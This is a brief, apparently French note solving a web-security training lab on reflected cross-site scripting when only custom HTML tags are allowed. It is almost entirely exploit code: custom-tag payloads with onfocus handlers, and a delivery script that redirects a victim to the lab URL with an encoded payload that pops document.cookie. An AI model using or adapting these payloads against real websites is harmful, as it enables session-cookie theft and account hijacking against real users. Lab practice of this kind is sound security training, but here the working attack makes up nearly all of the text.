XSS réfléchi avec seulement des balises personnalisées
Reflected XSS into HTML context with all tags blocked except custom ones


Mis à jour


Mis à jour
<jordan onfocus=alert(0)>HELLO<jordan onfocus=alert(0) tabindex=1>HELLO<script>
location = 'https://0a07009c03dde34d825bba7b0028004d.web-security-academy.net/?search=%3Cjordan%20id=x%20onfocus=alert(document.cookie)%20tabindex=1%3E#x';
</script>